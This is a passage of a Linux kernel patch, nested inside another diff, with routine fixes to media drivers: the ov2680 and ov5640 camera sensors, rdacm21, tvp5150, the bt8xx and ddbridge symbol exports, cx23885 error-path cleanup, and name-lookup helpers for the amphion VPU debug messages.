+@@ -898,11 +753,8 @@ static int ov2680_mode_init(struct ov2680_dev *sensor)
+ 	const struct ov2680_mode_info *init_mode;
+ 
+ 	/* set initial mode */
+-	sensor->fmt.code = MEDIA_BUS_FMT_SBGGR10_1X10;
+-	sensor->fmt.width = 800;
+-	sensor->fmt.height = 600;
+-	sensor->fmt.field = V4L2_FIELD_NONE;
+-	sensor->fmt.colorspace = V4L2_COLORSPACE_SRGB;
++	ov2680_fill_format(sensor, &sensor->fmt,
++			   OV2680_DEFAULT_WIDTH, OV2680_DEFAULT_HEIGHT);
+ 
+ 	sensor->frame_interval.denominator = OV2680_FRAME_RATE;
+ 	sensor->frame_interval.numerator = 1;
+@@ -926,9 +778,7 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 	v4l2_i2c_subdev_init(&sensor->sd, sensor->i2c_client,
+ 			     &ov2680_subdev_ops);
+ 
+-#ifdef CONFIG_VIDEO_V4L2_SUBDEV_API
+ 	sensor->sd.flags = V4L2_SUBDEV_FL_HAS_DEVNODE;
+-#endif
+ 	sensor->pad.flags = MEDIA_PAD_FL_SOURCE;
+ 	sensor->sd.entity.function = MEDIA_ENT_F_CAM_SENSOR;
+ 
+@@ -936,7 +786,7 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	v4l2_ctrl_handler_init(hdl, 7);
++	v4l2_ctrl_handler_init(hdl, 5);
+ 
+ 	hdl->lock = &sensor->lock;
+ 
+@@ -948,16 +798,9 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 					ARRAY_SIZE(test_pattern_menu) - 1,
+ 					0, 0, test_pattern_menu);
+ 
+-	ctrls->auto_exp = v4l2_ctrl_new_std_menu(hdl, ops,
+-						 V4L2_CID_EXPOSURE_AUTO,
+-						 V4L2_EXPOSURE_MANUAL, 0,
+-						 V4L2_EXPOSURE_AUTO);
+-
+ 	ctrls->exposure = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_EXPOSURE,
+ 					    0, 32767, 1, 0);
+ 
+-	ctrls->auto_gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_AUTOGAIN,
+-					     0, 1, 1, 1);
+ 	ctrls->gain = v4l2_ctrl_new_std(hdl, ops, V4L2_CID_GAIN, 0, 2047, 1, 0);
+ 
+ 	if (hdl->error) {
+@@ -965,11 +808,8 @@ static int ov2680_v4l2_register(struct ov2680_dev *sensor)
+ 		goto cleanup_entity;
+ 	}
+ 
+-	ctrls->gain->flags |= V4L2_CTRL_FLAG_VOLATILE;
+-	ctrls->exposure->flags |= V4L2_CTRL_FLAG_VOLATILE;
+-
+-	v4l2_ctrl_auto_cluster(2, &ctrls->auto_gain, 0, true);
+-	v4l2_ctrl_auto_cluster(2, &ctrls->auto_exp, 1, true);
++	ctrls->vflip->flags |= V4L2_CTRL_FLAG_MODIFY_LAYOUT;
++	ctrls->hflip->flags |= V4L2_CTRL_FLAG_MODIFY_LAYOUT;
+ 
+ 	sensor->sd.ctrl_handler = hdl;
+ 
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 267f514023e72..2ee832426736d 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -557,9 +557,7 @@ static const struct reg_value ov5640_init_setting[] = {
+ 	{0x4001, 0x02, 0, 0}, {0x4004, 0x02, 0, 0}, {0x3000, 0x00, 0, 0},
+ 	{0x3002, 0x1c, 0, 0}, {0x3004, 0xff, 0, 0}, {0x3006, 0xc3, 0, 0},
+ 	{0x302e, 0x08, 0, 0}, {0x4300, 0x3f, 0, 0},
+-	{0x501f, 0x00, 0, 0}, {0x4407, 0x04, 0, 0},
+-	{0x440e, 0x00, 0, 0}, {0x460b, 0x35, 0, 0}, {0x460c, 0x22, 0, 0},
+-	{0x4837, 0x0a, 0, 0}, {0x3824, 0x02, 0, 0},
++	{0x501f, 0x00, 0, 0}, {0x440e, 0x00, 0, 0}, {0x4837, 0x0a, 0, 0},
+ 	{0x5000, 0xa7, 0, 0}, {0x5001, 0xa3, 0, 0}, {0x5180, 0xff, 0, 0},
+ 	{0x5181, 0xf2, 0, 0}, {0x5182, 0x00, 0, 0}, {0x5183, 0x14, 0, 0},
+ 	{0x5184, 0x25, 0, 0}, {0x5185, 0x24, 0, 0}, {0x5186, 0x09, 0, 0},
+@@ -623,7 +621,8 @@ static const struct reg_value ov5640_setting_low_res[] = {
+ 	{0x3a0a, 0x00, 0, 0}, {0x3a0b, 0xf6, 0, 0}, {0x3a0e, 0x03, 0, 0},
+ 	{0x3a0d, 0x04, 0, 0}, {0x3a14, 0x03, 0, 0}, {0x3a15, 0xd8, 0, 0},
+ 	{0x4001, 0x02, 0, 0}, {0x4004, 0x02, 0, 0},
+-	{0x4407, 0x04, 0, 0}, {0x5001, 0xa3, 0, 0},
++	{0x4407, 0x04, 0, 0}, {0x460b, 0x35, 0, 0}, {0x460c, 0x22, 0, 0},
++	{0x3824, 0x02, 0, 0}, {0x5001, 0xa3, 0, 0},
+ };
+ 
+ static const struct reg_value ov5640_setting_720P_1280_720[] = {
+@@ -2442,16 +2441,13 @@ static void ov5640_power(struct ov5640_dev *sensor, bool enable)
+ static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ {
+ 	if (sensor->pwdn_gpio) {
+-		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
++		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+ 
+ 		/* camera power cycle */
+ 		ov5640_power(sensor, false);
+-		usleep_range(5000, 10000);
++		usleep_range(5000, 10000);	/* t2 */
+ 		ov5640_power(sensor, true);
+-		usleep_range(5000, 10000);
+-
+-		gpiod_set_value_cansleep(sensor->reset_gpio, 1);
+-		usleep_range(1000, 2000);
++		usleep_range(1000, 2000);	/* t3 */
+ 
+ 		gpiod_set_value_cansleep(sensor->reset_gpio, 0);
+ 	} else {
+@@ -2459,7 +2455,7 @@ static void ov5640_powerup_sequence(struct ov5640_dev *sensor)
+ 		ov5640_write_reg(sensor, OV5640_REG_SYS_CTRL0,
+ 				 OV5640_REG_SYS_CTRL0_SW_RST);
+ 	}
+-	usleep_range(20000, 25000);
++	usleep_range(20000, 25000);	/* t4 */
+ 
+ 	/*
+ 	 * software standby: allows registers programming;
+@@ -2532,9 +2528,9 @@ static int ov5640_set_power_mipi(struct ov5640_dev *sensor, bool on)
+ 	 *		  "ov5640_set_stream_mipi()")
+ 	 * [4] = 0	: Power up MIPI HS Tx
+ 	 * [3] = 0	: Power up MIPI LS Rx
+-	 * [2] = 0	: MIPI interface disabled
++	 * [2] = 1	: MIPI interface enabled
+ 	 */
+-	ret = ov5640_write_reg(sensor, OV5640_REG_IO_MIPI_CTRL00, 0x40);
++	ret = ov5640_write_reg(sensor, OV5640_REG_IO_MIPI_CTRL00, 0x44);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/media/i2c/rdacm21.c b/drivers/media/i2c/rdacm21.c
+index 9ccc56c30d3b0..d269c541ebe4c 100644
+--- a/drivers/media/i2c/rdacm21.c
++++ b/drivers/media/i2c/rdacm21.c
+@@ -351,7 +351,7 @@ static void ov10640_power_up(struct rdacm21_device *dev)
+ static int ov10640_check_id(struct rdacm21_device *dev)
+ {
+ 	unsigned int i;
+-	u8 val;
++	u8 val = 0;
+ 
+ 	/* Read OV10640 ID to test communications. */
+ 	for (i = 0; i < OV10640_PID_TIMEOUT; ++i) {
+diff --git a/drivers/media/i2c/tvp5150.c b/drivers/media/i2c/tvp5150.c
+index 859f1cb2fa744..84f87c016f9b5 100644
+--- a/drivers/media/i2c/tvp5150.c
++++ b/drivers/media/i2c/tvp5150.c
+@@ -2068,6 +2068,10 @@ static int tvp5150_parse_dt(struct tvp5150 *decoder, struct device_node *np)
+ 		tvpc->ent.name = devm_kasprintf(dev, GFP_KERNEL, "%s %s",
+ 						v4l2c->name, v4l2c->label ?
+ 						v4l2c->label : "");
++		if (!tvpc->ent.name) {
++			ret = -ENOMEM;
++			goto err_free;
++		}
+ 	}
+ 
+ 	ep_np = of_graph_get_endpoint_by_regs(np, TVP5150_PAD_VID_OUT, 0);
+diff --git a/drivers/media/pci/bt8xx/dst.c b/drivers/media/pci/bt8xx/dst.c
+index 3e52a51982d76..110651e478314 100644
+--- a/drivers/media/pci/bt8xx/dst.c
++++ b/drivers/media/pci/bt8xx/dst.c
+@@ -1722,7 +1722,7 @@ struct dst_state *dst_attach(struct dst_state *state, struct dvb_adapter *dvb_ad
+ 	return state;				/*	Manu (DST is a card not a frontend)	*/
+ }
+ 
+-EXPORT_SYMBOL(dst_attach);
++EXPORT_SYMBOL_GPL(dst_attach);
+ 
+ static const struct dvb_frontend_ops dst_dvbt_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/pci/bt8xx/dst_ca.c b/drivers/media/pci/bt8xx/dst_ca.c
+index 85fcdc59f0d18..571392d80ccc6 100644
+--- a/drivers/media/pci/bt8xx/dst_ca.c
++++ b/drivers/media/pci/bt8xx/dst_ca.c
+@@ -668,7 +668,7 @@ struct dvb_device *dst_ca_attach(struct dst_state *dst, struct dvb_adapter *dvb_
+ 	return NULL;
+ }
+ 
+-EXPORT_SYMBOL(dst_ca_attach);
++EXPORT_SYMBOL_GPL(dst_ca_attach);
+ 
+ MODULE_DESCRIPTION("DST DVB-S/T/C Combo CA driver");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/pci/cx23885/cx23885-dvb.c b/drivers/media/pci/cx23885/cx23885-dvb.c
+index 8fd5b6ef24282..7551ca4a322a4 100644
+--- a/drivers/media/pci/cx23885/cx23885-dvb.c
++++ b/drivers/media/pci/cx23885/cx23885-dvb.c
+@@ -2459,16 +2459,10 @@ static int dvb_register(struct cx23885_tsport *port)
+ 			request_module("%s", info.type);
+ 			client_tuner = i2c_new_client_device(&dev->i2c_bus[1].i2c_adap, &info);
+ 			if (!i2c_client_has_driver(client_tuner)) {
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			if (!try_module_get(client_tuner->dev.driver->owner)) {
+ 				i2c_unregister_device(client_tuner);
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			port->i2c_client_tuner = client_tuner;
+@@ -2505,16 +2499,10 @@ static int dvb_register(struct cx23885_tsport *port)
+ 			request_module("%s", info.type);
+ 			client_tuner = i2c_new_client_device(&dev->i2c_bus[1].i2c_adap, &info);
+ 			if (!i2c_client_has_driver(client_tuner)) {
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			if (!try_module_get(client_tuner->dev.driver->owner)) {
+ 				i2c_unregister_device(client_tuner);
+-				module_put(client_demod->dev.driver->owner);
+-				i2c_unregister_device(client_demod);
+-				port->i2c_client_demod = NULL;
+ 				goto frontend_detach;
+ 			}
+ 			port->i2c_client_tuner = client_tuner;
+diff --git a/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c b/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c
+index 6868a0c4fc82a..520ebd16b0c44 100644
+--- a/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c
++++ b/drivers/media/pci/ddbridge/ddbridge-dummy-fe.c
+@@ -112,7 +112,7 @@ struct dvb_frontend *ddbridge_dummy_fe_qam_attach(void)
+ 	state->frontend.demodulator_priv = state;
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(ddbridge_dummy_fe_qam_attach);
++EXPORT_SYMBOL_GPL(ddbridge_dummy_fe_qam_attach);
+ 
+ static const struct dvb_frontend_ops ddbridge_dummy_fe_qam_ops = {
+ 	.delsys = { SYS_DVBC_ANNEX_A },
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index c08b5a2bfc1df..dc35a87e628ec 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -249,7 +249,8 @@ static int vdec_update_state(struct vpu_inst *inst, enum vpu_codec_state state,
+ 		vdec->state = VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE;
+ 
+ 	if (inst->state != pre_state)
+-		vpu_trace(inst->dev, "[%d] %d -> %d\n", inst->id, pre_state, inst->state);
++		vpu_trace(inst->dev, "[%d] %s -> %s\n", inst->id,
++			  vpu_codec_state_name(pre_state), vpu_codec_state_name(inst->state));
+ 
+ 	if (inst->state == VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE)
+ 		vdec_handle_resolution_change(inst);
+@@ -956,6 +957,7 @@ static int vdec_response_frame_abnormal(struct vpu_inst *inst)
+ {
+ 	struct vdec_t *vdec = inst->priv;
+ 	struct vpu_fs_info info;
++	int ret;
+ 
+ 	if (!vdec->req_frame_count)
+ 		return 0;
+@@ -963,7 +965,9 @@ static int vdec_response_frame_abnormal(struct vpu_inst *inst)
+ 	memset(&info, 0, sizeof(info));
+ 	info.type = MEM_RES_FRAME;
+ 	info.tag = vdec->seq_tag + 0xf0;
+-	vpu_session_alloc_fs(inst, &info);
++	ret = vpu_session_alloc_fs(inst, &info);
++	if (ret)
++		return ret;
+ 	vdec->req_frame_count--;
+ 
+ 	return 0;
+@@ -994,8 +998,8 @@ static int vdec_response_frame(struct vpu_inst *inst, struct vb2_v4l2_buffer *vb
+ 		return -EINVAL;
+ 	}
+ 
+-	dev_dbg(inst->dev, "[%d] state = %d, alloc fs %d, tag = 0x%x\n",
+-		inst->id, inst->state, vbuf->vb2_buf.index, vdec->seq_tag);
++	dev_dbg(inst->dev, "[%d] state = %s, alloc fs %d, tag = 0x%x\n",
++		inst->id, vpu_codec_state_name(inst->state), vbuf->vb2_buf.index, vdec->seq_tag);
+ 	vpu_buf = to_vpu_vb2_buffer(vbuf);
+ 
+ 	memset(&info, 0, sizeof(info));
+@@ -1354,7 +1358,7 @@ static void vdec_abort(struct vpu_inst *inst)
+ 	struct vpu_rpc_buffer_desc desc;
+ 	int ret;
+ 
+-	vpu_trace(inst->dev, "[%d] state = %d\n", inst->id, inst->state);
++	vpu_trace(inst->dev, "[%d] state = %s\n", inst->id, vpu_codec_state_name(inst->state));
+ 
+ 	vdec->aborting = true;
+ 	vpu_iface_add_scode(inst, SCODE_PADDING_ABORT);
+@@ -1407,9 +1411,7 @@ static void vdec_release(struct vpu_inst *inst)
+ {
+ 	if (inst->id != VPU_INST_NULL_ID)
+ 		vpu_trace(inst->dev, "[%d]\n", inst->id);
+-	vpu_inst_lock(inst);
+ 	vdec_stop(inst, true);
+-	vpu_inst_unlock(inst);
+ }
+ 
+ static void vdec_cleanup(struct vpu_inst *inst)
+diff --git a/drivers/media/platform/amphion/venc.c b/drivers/media/platform/amphion/venc.c
+index e8cb22da938e6..1df2b35c1a240 100644
+--- a/drivers/media/platform/amphion/venc.c
++++ b/drivers/media/platform/amphion/venc.c
+@@ -278,7 +278,7 @@ static int venc_g_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ {
+ 	struct vpu_inst *inst = to_inst(file);
+ 	struct venc_t *venc = inst->priv;
+-	struct v4l2_fract *timeperframe = &parm->parm.capture.timeperframe;
++	struct v4l2_fract *timeperframe;
+ 
+ 	if (!parm)
+ 		return -EINVAL;
+@@ -289,6 +289,7 @@ static int venc_g_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ 	if (!vpu_helper_check_type(inst, parm->type))
+ 		return -EINVAL;
+ 
++	timeperframe = &parm->parm.capture.timeperframe;
+ 	parm->parm.capture.capability = V4L2_CAP_TIMEPERFRAME;
+ 	parm->parm.capture.readbuffers = 0;
+ 	timeperframe->numerator = venc->params.frame_rate.numerator;
+@@ -301,7 +302,7 @@ static int venc_s_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ {
+ 	struct vpu_inst *inst = to_inst(file);
+ 	struct venc_t *venc = inst->priv;
+-	struct v4l2_fract *timeperframe = &parm->parm.capture.timeperframe;
++	struct v4l2_fract *timeperframe;
+ 	unsigned long n, d;
+ 
+ 	if (!parm)
+@@ -313,6 +314,7 @@ static int venc_s_parm(struct file *file, void *fh, struct v4l2_streamparm *parm
+ 	if (!vpu_helper_check_type(inst, parm->type))
+ 		return -EINVAL;
+ 
++	timeperframe = &parm->parm.capture.timeperframe;
+ 	if (!timeperframe->numerator)
+ 		timeperframe->numerator = venc->params.frame_rate.numerator;
+ 	if (!timeperframe->denominator)
+diff --git a/drivers/media/platform/amphion/vpu.h b/drivers/media/platform/amphion/vpu.h
+index 048c23c2bf4db..deb2288d42904 100644
+--- a/drivers/media/platform/amphion/vpu.h
++++ b/drivers/media/platform/amphion/vpu.h
+@@ -353,6 +353,9 @@ void vpu_inst_record_flow(struct vpu_inst *inst, u32 flow);
+ int vpu_core_driver_init(void);
+ void vpu_core_driver_exit(void);
+ 
++const char *vpu_id_name(u32 id);
++const char *vpu_codec_state_name(enum vpu_codec_state state);
++
+ extern bool debug;
+ #define vpu_trace(dev, fmt, arg...)					\
+ 	do {								\
+diff --git a/drivers/media/platform/amphion/vpu_cmds.c b/drivers/media/platform/amphion/vpu_cmds.c
+index fa581ba6bab2d..235b71398d403 100644
+--- a/drivers/media/platform/amphion/vpu_cmds.c
++++ b/drivers/media/platform/amphion/vpu_cmds.c
+@@ -98,7 +98,7 @@ static struct vpu_cmd_t *vpu_alloc_cmd(struct vpu_inst *inst, u32 id, void *data
+ 	cmd->id = id;
+ 	ret = vpu_iface_pack_cmd(inst->core, cmd->pkt, inst->id, id, data);
+ 	if (ret) {
+-		dev_err(inst->dev, "iface pack cmd(%d) fail\n", id);
++		dev_err(inst->dev, "iface pack cmd %s fail\n", vpu_id_name(id));
+ 		vfree(cmd->pkt);
+ 		vfree(cmd);
+ 		return NULL;
+@@ -125,14 +125,14 @@ static int vpu_session_process_cmd(struct vpu_inst *inst, struct vpu_cmd_t *cmd)
+ {
+ 	int ret;
+ 
+-	dev_dbg(inst->dev, "[%d]send cmd(0x%x)\n", inst->id, cmd->id);
++	dev_dbg(inst->dev, "[%d]send cmd %s\n", inst->id, vpu_id_name(cmd->id));
+ 	vpu_iface_pre_send_cmd(inst);
+ 	ret = vpu_cmd_send(inst->core, cmd->pkt);
+ 	if (!ret) {
+ 		vpu_iface_post_send_cmd(inst);
+ 		vpu_inst_record_flow(inst, cmd->id);
+ 	} else {
+-		dev_err(inst->dev, "[%d] iface send cmd(0x%x) fail\n", inst->id, cmd->id);
++		dev_err(inst->dev, "[%d] iface send cmd %s fail\n", inst->id, vpu_id_name(cmd->id));
+ 	}
+ 
+ 	return ret;
+@@ -149,7 +149,8 @@ static void vpu_process_cmd_request(struct vpu_inst *inst)
+ 	list_for_each_entry_safe(cmd, tmp, &inst->cmd_q, list) {
+ 		list_del_init(&cmd->list);
+ 		if (vpu_session_process_cmd(inst, cmd))
+-			dev_err(inst->dev, "[%d] process cmd(%d) fail\n", inst->id, cmd->id);
++			dev_err(inst->dev, "[%d] process cmd %s fail\n",
++				inst->id, vpu_id_name(cmd->id));
+ 		if (cmd->request) {
+ 			inst->pending = (void *)cmd;
+ 			break;
+@@ -305,7 +306,8 @@ static void vpu_core_keep_active(struct vpu_core *core)
+ 
+ 	dev_dbg(core->dev, "try to wake up\n");
+ 	mutex_lock(&core->cmd_lock);
+-	vpu_cmd_send(core, &pkt);
++	if (vpu_cmd_send(core, &pkt))
++		dev_err(core->dev, "fail to keep active\n");
+ 	mutex_unlock(&core->cmd_lock);
+ }
+ 
+@@ -313,7 +315,7 @@ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ {
+ 	unsigned long key;
+ 	int sync = false;
+-	int ret = -EINVAL;
++	int ret;
+ 
+ 	if (inst->id < 0)
+ 		return -EINVAL;
+@@ -339,7 +341,7 @@ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ 
+ exit:
+ 	if (ret)
+-		dev_err(inst->dev, "[%d] send cmd(0x%x) fail\n", inst->id, id);
++		dev_err(inst->dev, "[%d] send cmd %s fail\n", inst->id, vpu_id_name(id));
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/platform/amphion/vpu_core.c b/drivers/media/platform/amphion/vpu_core.c
+index be80410682681..9add73b9b45f9 100644
+--- a/drivers/media/platform/amphion/vpu_core.c
++++ b/drivers/media/platform/amphion/vpu_core.c
+@@ -88,6 +88,8 @@ static int vpu_core_boot_done(struct vpu_core *core)
+ 
+ 		core->supported_instance_count = min(core->supported_instance_count, count);
+ 	}
++	if (core->supported_instance_count >= BITS_PER_TYPE(core->instance_mask))
++		core->supported_instance_count = BITS_PER_TYPE(core->instance_mask);
+ 	core->fw_version = fw_version;
+ 	vpu_core_set_state(core, VPU_CORE_ACTIVE);
+ 
+diff --git a/drivers/media/platform/amphion/vpu_dbg.c b/drivers/media/platform/amphion/vpu_dbg.c
+index 260f1c4b8f8dc..f105da82d92f9 100644
+--- a/drivers/media/platform/amphion/vpu_dbg.c
++++ b/drivers/media/platform/amphion/vpu_dbg.c
+@@ -50,6 +50,13 @@ static char *vpu_stat_name[] = {
+ 	[VPU_BUF_STATE_ERROR] = "error",
+ };
+ 
++static inline const char *to_vpu_stat_name(int state)
++{
++	if (state <= VPU_BUF_STATE_ERROR)
++		return vpu_stat_name[state];
++	return "unknown";
++}
++
+ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ {
+ 	struct vpu_inst *inst = s->private;
+@@ -67,7 +74,7 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 	num = scnprintf(str, sizeof(str), "tgig = %d,pid = %d\n", inst->tgid, inst->pid);
+ 	if (seq_write(s, str, num))
+ 		return 0;
+-	num = scnprintf(str, sizeof(str), "state = %d\n", inst->state);
++	num = scnprintf(str, sizeof(str), "state = %s\n", vpu_codec_state_name(inst->state));
+ 	if (seq_write(s, str, num))
+ 		return 0;
+ 	num = scnprintf(str, sizeof(str),
+@@ -141,7 +148,7 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 		num = scnprintf(str, sizeof(str),
+ 				"output [%2d] state = %10s, %8s\n",
+ 				i, vb2_stat_name[vb->state],
+-				vpu_stat_name[vpu_get_buffer_state(vbuf)]);
++				to_vpu_stat_name(vpu_get_buffer_state(vbuf)));
+ 		if (seq_write(s, str, num))
+ 			return 0;
+ 	}
+@@ -156,7 +163,7 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 		num = scnprintf(str, sizeof(str),
+ 				"capture[%2d] state = %10s, %8s\n",
+ 				i, vb2_stat_name[vb->state],
+-				vpu_stat_name[vpu_get_buffer_state(vbuf)]);
++				to_vpu_stat_name(vpu_get_buffer_state(vbuf)));
+ 		if (seq_write(s, str, num))
+ 			return 0;
+ 	}
+@@ -188,9 +195,9 @@ static int vpu_dbg_instance(struct seq_file *s, void *data)
+ 
+ 		if (!inst->flows[idx])
+ 			continue;
+-		num = scnprintf(str, sizeof(str), "\t[%s]0x%x\n",
++		num = scnprintf(str, sizeof(str), "\t[%s] %s\n",
+ 				inst->flows[idx] >= VPU_MSG_ID_NOOP ? "M" : "C",
+-				inst->flows[idx]);
++				vpu_id_name(inst->flows[idx]));
+ 		if (seq_write(s, str, num)) {
+ 			mutex_unlock(&inst->core->cmd_lock);
+ 			return 0;
+diff --git a/drivers/media/platform/amphion/vpu_helpers.c b/drivers/media/platform/amphion/vpu_helpers.c
+index e9aeb3453dfcb..2e78666322f02 100644
+--- a/drivers/media/platform/amphion/vpu_helpers.c
++++ b/drivers/media/platform/amphion/vpu_helpers.c
+@@ -11,6 +11,7 @@
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
+ #include "vpu.h"
++#include "vpu_defs.h"
+ #include "vpu_core.h"
+ #include "vpu_rpc.h"
+ #include "vpu_helpers.h"
+@@ -412,3 +413,63 @@ int vpu_find_src_by_dst(struct vpu_pair *pairs, u32 cnt, u32 dst)
+ 
+ 	return -EINVAL;
+ }
++
++const char *vpu_id_name(u32 id)
++{
++	switch (id) {
++	case VPU_CMD_ID_NOOP: return "noop";
++	case VPU_CMD_ID_CONFIGURE_CODEC: return "configure codec";
++	case VPU_CMD_ID_START: return "start";
++	case VPU_CMD_ID_STOP: return "stop";
++	case VPU_CMD_ID_ABORT: return "abort";
++	case VPU_CMD_ID_RST_BUF: return "reset buf";
++	case VPU_CMD_ID_SNAPSHOT: return "snapshot";
++	case VPU_CMD_ID_FIRM_RESET: return "reset firmware";
++	case VPU_CMD_ID_UPDATE_PARAMETER: return "update parameter";
++	case VPU_CMD_ID_FRAME_ENCODE: return "encode frame";
++	case VPU_CMD_ID_SKIP: return "skip";
++	case VPU_CMD_ID_FS_ALLOC: return "alloc fb";
++	case VPU_CMD_ID_FS_RELEASE: return "release fb";
++	case VPU_CMD_ID_TIMESTAMP: return "timestamp";
++	case VPU_CMD_ID_DEBUG: return "debug";
++	case VPU_MSG_ID_RESET_DONE: return "reset done";
++	case VPU_MSG_ID_START_DONE: return "start done";
++	case VPU_MSG_ID_STOP_DONE: return "stop done";
++	case VPU_MSG_ID_ABORT_DONE: return "abort done";
++	case VPU_MSG_ID_BUF_RST: return "buf reset done";
++	case VPU_MSG_ID_MEM_REQUEST: return "mem request";
++	case VPU_MSG_ID_PARAM_UPD_DONE: return "param upd done";
++	case VPU_MSG_ID_FRAME_INPUT_DONE: return "frame input done";
++	case VPU_MSG_ID_ENC_DONE: return "encode done";
++	case VPU_MSG_ID_DEC_DONE: return "frame display";
++	case VPU_MSG_ID_FRAME_REQ: return "fb request";
++	case VPU_MSG_ID_FRAME_RELEASE: return "fb release";
++	case VPU_MSG_ID_SEQ_HDR_FOUND: return "seq hdr found";
++	case VPU_MSG_ID_RES_CHANGE: return "resolution change";
++	case VPU_MSG_ID_PIC_HDR_FOUND: return "pic hdr found";
++	case VPU_MSG_ID_PIC_DECODED: return "picture decoded";
++	case VPU_MSG_ID_PIC_EOS: return "eos";
++	case VPU_MSG_ID_FIFO_LOW: return "fifo low";
++	case VPU_MSG_ID_BS_ERROR: return "bs error";
++	case VPU_MSG_ID_UNSUPPORTED: return "unsupported";
++	case VPU_MSG_ID_FIRMWARE_XCPT: return "exception";
++	case VPU_MSG_ID_PIC_SKIPPED: return "skipped";
++	}
++	return "<unknown>";
++}
++
++const char *vpu_codec_state_name(enum vpu_codec_state state)
++{
++	switch (state) {
++	case VPU_CODEC_STATE_DEINIT: return "initialization";
++	case VPU_CODEC_STATE_CONFIGURED: return "configured";
++	case VPU_CODEC_STATE_START: return "start";
++	case VPU_CODEC_STATE_STARTED: return "started";
++	case VPU_CODEC_STATE_ACTIVE: return "active";
++	case VPU_CODEC_STATE_SEEK: return "seek";
++	case VPU_CODEC_STATE_STOP: return "stop";
++	case VPU_CODEC_STATE_DRAIN: return "drain";
++	case VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE: return "resolution change";
++	}
++	return "<unknown>";
++}
+diff --git a/drivers/media/platform/amphion/vpu_mbox.c b/drivers/media/platform/amphion/vpu_mbox.c
+index bf759eb2fd46d..b6d5b4844f672 100644
+--- a/drivers/media/platform/amphion/vpu_mbox.c
++++ b/drivers/media/platform/amphion/vpu_mbox.c
+@@ -46,11 +46,10 @@ static int vpu_mbox_request_channel(struct device *dev, struct vpu_mbox *mbox)
+ 	cl->rx_callback = vpu_mbox_rx_callback;
+ 
+ 	ch = mbox_request_channel_byname(cl, mbox->name);
+-	if (IS_ERR(ch)) {
+-		dev_err(dev, "Failed to request mbox chan %s, ret : %ld\n",
+-			mbox->name, PTR_ERR(ch));
+-		return PTR_ERR(ch);
+-	}
++	if (IS_ERR(ch))
++		return dev_err_probe(dev, PTR_ERR(ch),
++				     "Failed to request mbox chan %s\n",
++				     mbox->name);
+ 
+ 	mbox->ch = ch;
+ 	return 0;
+diff --git a/drivers/media/platform/amphion/vpu_msgs.c b/drivers/media/platform/amphion/vpu_msgs.c
+index 92672a802b492..d0ead051f7d18 100644
+--- a/drivers/media/platform/amphion/vpu_msgs.c
++++ b/drivers/media/platform/amphion/vpu_msgs.c
+@@ -32,7 +32,7 @@ static void vpu_session_handle_start_done(struct vpu_inst *inst, struct vpu_rpc_
+ 
+ static void vpu_session_handle_mem_request(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_pkt_mem_req_data req_data;
++	struct vpu_pkt_mem_req_data req_data = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, (void *)&req_data);
+ 	vpu_trace(inst->dev, "[%d] %d:%d %d:%d %d:%d\n",
+@@ -80,7 +80,7 @@ static void vpu_session_handle_resolution_change(struct vpu_inst *inst, struct v
+ 
+ static void vpu_session_handle_enc_frame_done(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_enc_pic_info info;
++	struct vpu_enc_pic_info info = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, (void *)&info);
+ 	dev_dbg(inst->dev, "[%d] frame id = %d, wptr = 0x%x, size = %d\n",
+@@ -90,7 +90,7 @@ static void vpu_session_handle_enc_frame_done(struct vpu_inst *inst, struct vpu_
+ 
+ static void vpu_session_handle_frame_request(struct vpu_inst *inst, struct vpu_rpc_event *pkt)
+ {
+-	struct vpu_fs_info fs;
++	struct vpu_fs_info fs = { 0 };
+ 
+ 	vpu_iface_unpack_msg_data(inst->core, pkt, &fs);
+ 	call_void_vop(inst, event_notify, VPU_MSG_ID_FRAME_REQ, &fs);
